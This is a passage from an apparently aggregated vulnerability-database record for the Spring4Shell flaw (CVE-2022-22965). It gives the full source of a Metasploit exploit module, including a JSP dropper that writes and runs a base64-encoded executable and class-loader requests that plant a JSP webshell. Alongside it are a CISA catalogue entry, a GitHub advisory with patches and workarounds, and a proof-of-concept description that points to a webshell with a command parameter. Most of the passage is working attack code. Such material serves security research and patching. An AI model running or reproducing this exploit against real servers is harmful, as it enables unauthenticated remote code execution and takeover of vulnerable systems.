'get' : 'post'}\"\n res = send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }\n )\n\n # setting the default assertion status to a valid status\n send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }\n )\n return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n prefix_jsp = rand_text_alphanumeric(rand(3..5))\n date_format = rand_text_numeric(rand(1..4))\n @jsp_file = prefix_jsp + date_format + '.jsp'\n http_method = datastore['HTTP_METHOD']\n if http_method == 'Automatic'\n # if the check was skipped but we need to automatically identify the method, we have to run it here\n @checkcode = check if @checkcode.nil?\n http_method = @checkcode.details[:method]\n fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?\n\n print_good(\"Automatically identified HTTP method: #{http_method}\")\n end\n\n # if the check method ran automatically, add a short delay before continuing with exploitation\n sleep(5) if @checkcode\n\n # Prepare the JSP\n print_status(\"#{peer} - Generating JSP...\")\n\n # rubocop:disable Style/FormatStringToken\n jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')\n # rubocop:enable Style/FormatStringToken\n\n # Modify the Class Loader\n print_status(\"#{peer} - Modifying Class Loader...\")\n properties = {\n payload: jsp,\n directory: datastore['PAYLOAD_PATH'],\n prefix: prefix_jsp,\n suffix: '.jsp',\n file_date_format: date_format\n }\n res = modify_class_loader(http_method, properties)\n unless res\n fail_with(Failure::TimeoutExpired, \"#{peer} - No answer\")\n end\n\n # No matter what happened, try to 'restore' the Class Loader\n properties = {\n payload: '',\n 
directory: '',\n prefix: '',\n suffix: '',\n file_date_format: ''\n }\n\n modify_class_loader(http_method, properties)\n\n check_log_file\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/spring_framework_rce_spring4shell.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2023-12-03T16:07:25", "description": "Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T00:00:00", "type": "cisa_kev", "title": "Spring Framework JDK 9+ Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T00:00:00", "id": "CISA-KEV-CVE-2022-22965", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-12-03T17:19:00", "description": "Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when 
running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "zdt", "title": "Spring4Shell Spring Framework Class Property Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T00:00:00", "id": "1337DAY-ID-37692", "href": "https://0day.today/exploit/description/37692", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass 
MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking # It's going to manipulate the Class Loader\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',\n 'Description' => %q{\n Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above\n and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable\n to remote code execution due to an unsafe data binding used to populate an object from request parameters\n to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the\n org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:\n class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can\n gain remote code execution.\n },\n 'Author' => [\n 'vleminator <vleminator[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-22965'],\n ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],\n ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']\n ],\n 'Platform' => %w[linux win],\n 'Payload' => {\n 'Space' => 5000,\n 'DisableNops' => true\n },\n 'Targets' => [\n [\n 'Java',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => %w[linux win]\n },\n ],\n [\n 'Linux',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux'\n }\n ],\n [\n 'Windows',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win'\n }\n ]\n ],\n 'DisclosureDate' => '2022-03-31',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Spring4Shell', 'SpringShell'],\n 'Stability' => [CRASH_SAFE],\n 
'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),\n OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),\n OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),\n ]\n )\n register_advanced_options [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def jsp_dropper(file, exe)\n # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.\n dropper = <<~EOS\n <%@ page import=\\\"java.io.FileOutputStream\\\" %>\n <%@ page import=\\\"java.util.Base64\\\" %>\n <%@ page import=\\\"java.io.File\\\" %>\n <%\n FileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false);\n oFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\"));\n oFile.flush();\n oFile.close();\n File f = new File(\\\"#{file}\\\");\n f.setExecutable(true);\n Runtime.getRuntime().exec(\\\"#{file}\\\");\n %>\n EOS\n\n dropper\n end\n\n def modify_class_loader(method, opts)\n cl_prefix = 'class.module.classLoader'\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'version' => '1.1',\n 'method' => method,\n 'headers' => {\n 'c1' => '<%', # %{c1}i replacement in payload\n 'c2' => '%>' # %{c2}i replacement in payload\n },\n \"vars_#{method == 'GET' ? 
'get' : 'post'}\" => {\n \"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format]\n }\n })\n end\n\n def check_log_file\n print_status(\"#{peer} - Waiting for the server to flush the logfile\")\n print_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\")\n\n succeeded = retry_until_true(timeout: 60) do\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(@jsp_file)\n })\n\n res&.code == 200 && !res.body.blank?\n end\n\n fail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded\n\n print_good(\"#{peer} - Log file flushed\")\n end\n\n # Fix the JSP payload to make it valid once is dropped\n # to the log file\n def fix(jsp)\n output = ''\n jsp.each_line do |l|\n if l =~ /<%.*%>/\n output << l\n elsif l =~ /<%/\n next\n elsif l =~ /%>/\n next\n elsif l.chomp.empty?\n next\n else\n output << \"<% #{l.chomp} %>\"\n end\n end\n output\n end\n\n def create_jsp\n jsp = <<~EOS\n <%\n File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\");\n jsp.delete();\n %>\n #{Faker::Internet.uuid}\n EOS\n if target['Arch'] == ARCH_JAVA\n jsp << fix(payload.encoded)\n else\n payload_exe = generate_payload_exe\n payload_filename = rand_text_alphanumeric(rand(4..7))\n\n if target['Platform'] == 'win'\n payload_path = datastore['WritableDir'] + '\\\\' + payload_filename\n else\n payload_path = datastore['WritableDir'] + '/' + payload_filename\n end\n\n jsp << jsp_dropper(payload_path, payload_exe)\n register_files_for_cleanup(payload_path)\n end\n\n jsp\n end\n\n def check\n @checkcode = 
_check\n end\n\n def _check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))\n )\n\n return CheckCode::Unknown('Web server seems unresponsive') unless res\n\n if res.headers.key?('Server')\n res.headers['Server'].match(%r{(.*)/([\\d|.]+)$})\n else\n res.body.match(%r{Apache\\s(.*)/([\\d|.]+)})\n end\n\n server = Regexp.last_match(1) || nil\n version = Rex::Version.new(Regexp.last_match(2)) || nil\n\n return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)\n\n vprint_status(\"Detected #{server} #{version} running\")\n\n if datastore['HTTP_METHOD'] == 'Automatic'\n # prefer POST over get to keep the vars out of the query string if possible\n methods = %w[POST GET]\n else\n methods = [ datastore['HTTP_METHOD'] ]\n end\n\n methods.each do |method|\n vars = \"vars_#{method == 'GET' ? 'get' : 'post'}\"\n res = send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }\n )\n\n # setting the default assertion status to a valid status\n send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }\n )\n return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n prefix_jsp = rand_text_alphanumeric(rand(3..5))\n date_format = rand_text_numeric(rand(1..4))\n @jsp_file = prefix_jsp + date_format + '.jsp'\n http_method = datastore['HTTP_METHOD']\n if http_method == 'Automatic'\n # if the check was skipped but we need to automatically identify the method, we have to run it here\n @checkcode = check if @checkcode.nil?\n http_method = @checkcode.details[:method]\n fail_with(Failure::BadConfig, 'Failed to automatically identify the 
HTTP method') if http_method.blank?\n\n print_good(\"Automatically identified HTTP method: #{http_method}\")\n end\n\n # if the check method ran automatically, add a short delay before continuing with exploitation\n sleep(5) if @checkcode\n\n # Prepare the JSP\n print_status(\"#{peer} - Generating JSP...\")\n\n # rubocop:disable Style/FormatStringToken\n jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')\n # rubocop:enable Style/FormatStringToken\n\n # Modify the Class Loader\n print_status(\"#{peer} - Modifying Class Loader...\")\n properties = {\n payload: jsp,\n directory: datastore['PAYLOAD_PATH'],\n prefix: prefix_jsp,\n suffix: '.jsp',\n file_date_format: date_format\n }\n res = modify_class_loader(http_method, properties)\n unless res\n fail_with(Failure::TimeoutExpired, \"#{peer} - No answer\")\n end\n\n # No matter what happened, try to 'restore' the Class Loader\n properties = {\n payload: '',\n directory: '',\n prefix: '',\n suffix: '',\n file_date_format: ''\n }\n\n modify_class_loader(http_method, properties)\n\n check_log_file\n\n handler\n end\n\n # Retry the block until it returns a truthy value. Each iteration attempt will\n # be performed with exponential backoff. If the timeout period surpasses, false is returned.\n def retry_until_true(timeout:)\n start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)\n ending_time = start_time + timeout\n retry_count = 0\n while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time\n result = yield\n return result if result\n\n retry_count += 1\n remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)\n break if remaining_time_budget <= 0\n\n delay = 2**retry_count\n if delay >= remaining_time_budget\n delay = remaining_time_budget\n vprint_status(\"Final attempt. 
Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}\")\n else\n vprint_status(\"Sleeping for #{delay} seconds before attempting again\")\n end\n\n sleep delay\n end\n\n false\n end\nend\n", "sourceHref": "https://0day.today/exploit/37692", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-12-03T17:28:12", "description": "Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. \n\n## Impact\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n- JDK 9 or higher\n- Apache Tomcat as the Servlet container\n- Packaged as WAR\n- `spring-webmvc` or `spring-webflux` dependency\n\n## Patches\n\n- Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE)\n- Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)\n\n## Workarounds\n\nFor those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. 
This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.\n\nTo apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:30:50", "type": "github", "title": "Remote Code Execution in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-31T05:04:23", "id": "GHSA-36P3-WJMG-H94X", "href": "https://github.com/advisories/GHSA-36p3-wjmg-h94x", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2023-12-03T16:47:17", "description": 
"This is a dockerized application that is [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to the Spring4Shell [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) (CVE-2022-22965). Full Java source for the war is provided and modifiable, the war will get re-built whenever the docker image is built. The built WAR will then be loaded by Tomcat. There is nothing special about this application, it's a simple hello world that's based off [Spring tutorials](<https://spring.io/guides/gs/handling-form-submission/> \"Spring tutorials\" ).\n\nDetails: <https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities>\n\nHaving issues with the POC? Check out the LunaSec fork at: <https://github.com/lunasec-io/Spring4Shell-POC>, it's more actively maintained.\n\n## Requirements\n\n 1. Docker\n 2. Python3 + requests library\n\n## Instructions\n\n 1. Clone the repository\n 2. Build and run the container: `docker build . -t spring4shell && docker run -p 8080:8080 spring4shell`\n 3. App should now be available at <http://localhost:8080/helloworld/greeting>\n\n 4. 
Run the exploit.py script: `python exploit.py --url \"http://localhost:8080/helloworld/greeting\"`\n\n 5. Visit the created webshell! Modify the `cmd` GET parameter for your commands. (`http://localhost:8080/shell.jsp` by default)\n\n## Notes\n\n**Fixed!** ~~As of this writing, the [container](<https://www.kitploit.com/search/label/Container> \"container\" ) (possibly just Tomcat) must be restarted between exploitations. I'm actively trying to resolve this.~~\n\nRe-running the exploit will create an extra artifact file of {old_filename}_.jsp.\n\nPRs/DMs [@Rezn0k](<https://twitter.com/rezn0k> \"@Rezn0k\" ) are welcome for improvements!\n\n## Credits\n\n * [@esheavyind](<https://twitter.com/esheavyind> \"@esheavyind\" ) for help on building a PoC. 
Check out their writeup at: <https://gist.github.com/esell/c9731a7e2c5404af7716a6810dc33e1a>\n * [@LunaSecIO](<https://twitter.com/LunaSecIO> \"@LunaSecIO\" ) for improving the documentation and exploit\n * [@rwincey](<https://twitter.com/rwincey> \"@rwincey\" ) for making the exploit replayable without requiring a [Tomcat](<https://www.kitploit.com/search/label/Tomcat> \"Tomcat\" ) restart\n \n \n\n\n**[Download Spring4Shell-POC](<https://github.com/reznok/Spring4Shell-POC> \"Download Spring4Shell-POC\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T12:30:00", "type": "kitploit", "title": "Spring4Shell-POC - Dockerized Spring4Shell (CVE-2022-22965) PoC Application And Exploit", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T12:30:00", "id": "KITPLOIT:3050371869908791295", "href": "http://www.kitploit.com/2022/05/spring4shell-poc-dockerized.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T16:47:19", "description": "# 
\n\n#### A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities\n\n[](<https://cam